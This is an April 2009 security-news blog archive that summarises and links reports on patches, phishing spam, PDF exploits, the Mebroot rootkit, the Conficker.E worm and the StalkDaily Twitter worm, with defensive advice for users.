April 2009 - Posts
It is beneficial for Office 2007 users to update to the new SP2 release to enjoy functional improvements. They should keep in mind that the service pack is fairly large (up to 290mb)
Office 2007 SP2 released
http://www.microsoft.com/downloads/details.aspx?FamilyId=B444BF18-79EA-46C6-8A81-9DB49B4AB6E5&displaylang=en
KB953195 Office 2007 SP2 - product-specific changes described
http://support.microsoft.com/default.aspx/kb/953195
QUOTE: The 2007 Microsoft Office Suite Service Pack 2 (SP2) provides customers with the latest updates to the 2007 Office suite (the products that are affected by this update are listed below). This download includes:
* Previously unreleased fixes that were made specifically for this service pack.
* In addition to general product fixes, this includes improvements in stability, performance, and security.
* All of the Public Updates, Security Updates, Cumulative Updates, and Hotfixes released through February 2009.
Numerous web sites are being registered and many of these will be used for legitimate purposes. However, some sites could be used for future phishing attacks or to seed malware. Please be careful with both email and websites that you might encounter related to this topic.
Extensive Registrations of Swine Flu Websites
(some of these site names could be used in future attacks)
http://isc.sans.org/diary.html?storyid=6280
http://www.f-secure.com/weblog/archives/00001668.html
http://www.f-secure.com/weblog/archives/swineflu_domains.txt
Spam messages are circulating that should be avoided, as they could contain malicious links 
Swine Flu Spam
http://www.avertlabs.com/research/blog/index.php/2009/04/27/swine-flue-spam/
http://blog.trendmicro.com/swine-flu-outbreak-hits-the-web-through-spam/
QUOTE: Subject Lines:
First US swine flu victims!
US swine flu statistics
Salma Hayek caught swine flu!
Swine flu worldwide!
Swine flu in Hollywood!
Swine flu in USA
Madonna caught swine flu!
During March, research on Ethics was conducted, which resulted in the following three newsletters that circulated to all members of the Blue Ridge CPCU chapter:
CPCU Research Project - Role of Ethics in Insurance
Microsoft has published a study of infections by Operating System based on recent MSRT cleaning statistics. While MSRT cleans only the most major malware incidents, this study helps confirm that Vista's out-of-the-box settings and architecture clearly provide security benefits.
Malware on Vista rare compared with XP
http://blogs.pcmag.com/securitywatch/2009/04/malware_on_vista_rare_accordin.php
Microsoft Security Intelligence Report Volume 6
http://www.microsoft.com/security/portal/sir.aspx
QUOTE: Comparing the latest service packs for each version, the infection rate of Windows Vista SP1 is 60.6 percent less than that of Windows XP SP3.
Adobe's Acrobat reader is the world's most established PDF reader. It's popularity has created a target for attack and malicious authors have been active in creating exploits. At RSA conference, alternative PDF readers were recommended to reduce PDF risks, as most of the current exploits are specifically written for Adobe.
As security can be improved through obsurity, vulnerabilities in other PDF readers might not explored as deeply. Adobe is frequently fixing these security holes. Users who prefer it should stay patched and use the latest version.
All users should avoid unusual PDFs and process them with up-to-date anti-virus software prior to opening them. Finally, use best practices and be careful with any PDF file you receive. If it's an unusual message containing a PDF attachment, always avoid opening it.
Article - Ditch Adobe Reader for Better Security
http://tech.yahoo.com/news/pcworld/20090421/tc_pcworld/ditchadobereaderforbettersecurity
QUOTE: The popular Adobe Reader is a favorite target of online crooks, according to Mikko Hypponen, chief research officer with antivirus company F-Secure. And for better security you should ditch Reader and go with a free alternative, he says.
Malware-pushing bad guys increasingly target Adobe Reader flaws, Hypponen says. In 2008, from Jan. 1 through April 16, F-Secure saw PDFs used in 128 dangerous drive-by attacks. This year, during the same time frame, the company has seen 2,305 drive-by's using PDFs. Such attacks go after a vulnerable Reader browser plugin, Hypponen says. Poisoned PDFs are also often used as part of a customized, targeted attack, he says, when they're sent to a specifically selected recipient attached to a well-crafted e-mail.
Hypponen didn't recommend any particular alternative program, but suggested heading to pdfreaders.org for a list of free apps. He did point out that at the time of IE 6's security infamy, many switched over to using Firefox. And as that browser gained significant market share, it also drew the hacker's eye. His hope, he says, is that people use a variety of alternate PDF readers and thereby fly under the bad guys' radar.
The overall goal is "a safer and more trusted Internet" experience. I'm still in a learning mode and below are some key resources discovered so far. The Vision link is a key one for articles and white papers:
Microsoft's End to End trust - Home Page
http://www.microsoft.com/mscorp/twc/endtoendtrust/
Microsoft's End to End trust - Vision
http://www.microsoft.com/mscorp/twc/endtoendtrust/vision.aspx
End to End trust - Community
http://www.microsoft.com/mscorp/twc/endtoendtrust/community.aspx
End to End trust - RSA Conference Addresses
http://www.microsoft.com/mscorp/twc/endtoendtrust/conference.aspx
End to End trust - Security Forums
http://social.microsoft.com/forums/en-US/EndToEndTrust/threads/
Mebroot (StealthMBR) is one of the most advanced rootkits circulating. New variants show even more advancements in hooking into the Windows OS kernel. AV detection has emerged to detect, eradicate, and repair MBR damages. Always use safe practices in handling media, files, and URLs.
Mebroot Rootkit - New Variants more advanced and difficult to detect
http://www.avertlabs.com/research/blog/index.php/2009/04/19/stealthmbr-gets-a-makeover/
http://www.prevx.com/blog/120/MBR-rootkit-changes-itself-and-strikes-again.html
QUOTE: StealthMBR has arguably been dubbed as the stealthiest rootkit ever seen. The new variants are using even ‘deeper’ techniques to evade detection. Broadly speaking, they are hijacking kernel objects (device object) to filter out access to the master boot record and prevent detection and repair.
A total of 43 security patches are available for Oracle's product lines. These should be tested and deployed expediently to keep critical data bases and tools secure.
Oracle Critical Patch Update Advisory - April 2009
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html
QUOTE: Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply fixes as soon as possible. This Critical Patch Update contains 43 new security fixes across all products.
The April updates are worth emphasizing this month. Applying Automatic Updates or performing this manually soon, would better protect your system. The ISC provides a good summary. They have three rated as "patch now" for exploits circulating in-the-wild.
MS Patch Tuesday Updates for April 2009
http://isc.sans.org/diary.html?storyid=6193
Microsoft Security Updates - April 2009 Patch Now
https://www.microsoft.com/technet/security/bulletin/ms09-apr.mspx
So far so good in applying these updates to my own systems.
Hospitals that run 24x7 have difficulties in finding time to reboot. Still, 700 is too many with the patch being out now for 6 months and the past awareness. This worm is very stealth and well written. The university seemed to contain and clean it up fairly well based on the account.
Conficker.E Attacks 700 University of Utah PCs
http://www.eweek.com/c/a/Security/Conficker-Attacks-700-University-of-Utah-PCs-835179/
The dreaded Conficker worm made an appearance at the University of Utah heading into the weekend, attaching more than 700 computers and spreading its malware to the university’s three hospitals.
A spokesperson for the university insisted that patient records remain unaffected. According to a report by the Associated Press, campus IT cut off online access for up to 6 hours on April 10, in a bid to isolate Conficker before it could cause further damage.
Conficker was first detected on campus on Thursday, April 9. In addition to infecting hospital computers, Conficker also infiltrated systems in the medical school and the colleges of nursing, pharmacy and health.
Administrators had informed staff and students on the best practices for scrubbing Conficker from computers and auxiliary devices such as smartphones.
Users should exit out of these programs carefully. Use CTRL+SHIFT+ESC to invoke the Windows Task manager and close out without clicking on any buttons. Always avoid purchasing or using this software, as it is not a true security product, but one to trick folks out of money (usually $49).
PAntispyware 09 - New Rogue variant of Antivirus 2009
http://sunbeltblog.blogspot.com/2009/04/new-rogue-p-antispyware-09.html
QUOTE: PAntispyware 09 is yet another rogue from WinSpywareProtect family of rogue security products.
F-Secure reports that the new Twitter worm is designed to infect as many folks as possible in spreading without a damaging payload. The capability to harm systems could change and hopefully these attacks will be stopped. For protection, update AV signatures and avoid any message containing the keyword "Stalkdaily" (and don't go to the website) as noted below.
Ongoing problems at Twitter
http://www.f-secure.com/weblog/archives/00001654.html
Twitter Worm Outbreak during Easter
http://www.f-secure.com/weblog/archives/00001653.html
QUOTE: Twitter administrators don't seem to be able to shut down the various XSS / CSRF worms that have been plaguing the service over the weekend. The actual problems to end users haven't been devastating - so far. Most of the Twitter worms simply modify people's profiles to infect more users. However, attacks like these could be much worse if the attackers would incorporate nastier attacks, such as browser exploits.
Wily Weekend Worms
http://blog.twitter.com/2009/04/wily-weekend-worms.html
QUOTE: On a weekend normally reserved for bunnies, a worm took center stage. A computer worm is a self-replicating computer program sometimes introduced by folks with malicious intent to do some harm to a network. Please note that no passwords, phone numbers, or other sensitive information was compromised as part of these attacks.
McAfee - Twettir Worm (move to DAT 5583)
http://vil.nai.com/vil/content/v_154580.htm
QUOTE: S/Twettir is the detection for a JavaScript that exploits a cross site scripting vulnerability in Twitter to infect other user profiles. This worm sends messages to all contacts containing any of the following strings:
AVOID THESE MESSAGES
* Dude, www.StalkDaily.com is awesome. What's the fuss?
* Join www.StalkDaily.com everyone!
* Woooo, www.StalkDaily.com :)
* Virus!? What? www.StalkDaily.com is legit!
* Wow...www.StalkDaily.com
* @twitter www.StalkDaily.com
* Twitter has been hacked !!!
* Twitter worm, read here
* StalkDaily worm on Twitter, more info
* HOWTO: Remove StalkDaily.com Auto-Tweets From Your Infected Twitter Profile | Twittercism
* #Stalkdaily virus runs riots on twitter. Learn how to remove it
The Microsoft Malware Protection Center has developed a comprehensive analysis of "E":
Microsoft Malware Protection Center - Conficker.E
http://blogs.technet.com/mmpc/archive/2009/04/09/win32-conficker-variants-update.aspx
QUOTE: However, deeper analysis shows the following (reminder, we are continuing to research this, but the differences are significant enough that we will be designating this new variant as Conficker.E):
* Exploits MS08-067
* Contains code to spread via network shares
* Drops a driver similar to early variants, using the same mechanisms as Conficker.B.
* Opens a web listener on a pseudo-random port between 1024 and 9999 based on the volume serial number of the system drive.
* Appears to appends a stream of randomly generated garbage to itself before offering itself for further propagation. (This will result in untrustworthy file identification information like the ones I use above to inform other researchers as to the specific variant I am talking about; but our community can work its way around that.)
* Contains some of the same IP-filtering used in Conficker.D (Don’t go to certain IP ranges)
* Periodically connect to the following URLs to check for internet connectivity:
* Periodically connect to one of the following sites (at random) to determine its external IP address:
* Deletes itself on and after May 3rd 2009
* Uses SSDP to find Internet gateway devices (i.e. routers) and issues a SOAP command on the device to open an external TCP port and redirect it to an internal IP:port.
* Drops a DLL component that contains P2P functionality
* A very key difference between the .E variant and previous A-D variants. The .E variant executes simultaneous to the existing Conficker.D already on that infected machine.
More details have surfaced from F-Secure's blog ...
Conficker.E - Additional information on new Variant
http://www.f-secure.com/weblog/archives/00001652.html
QUOTE: A new variant of Conficker was found yesterday. We're still investigating the files but here's what we know so far.
• On April 8th a new update was made available to Conficker.C infected machines via the P2P network
• The new file, which we call Conficker.E, is executed and co-exists alongside the old infection
• It re-introduces spreading via the MS08-067 vulnerability. Spreading functionality was removed in Conficker.C and the gang behind this maybe realized they made a mistake and added it again.
• There's a possible connection to Waledac, a spambot. Some Conficker.C infected computers connected to a well known Waledac domain and downloaded Waledac from there.
• There's also a connection to rogue anti-virus products as we've seen it end up on Conficker.C infected machines. The rogue product was Spyware Guard 2008.
• Conficker.E deletes itself if the date is May 3, 2009 or later.
More Posts
Next page »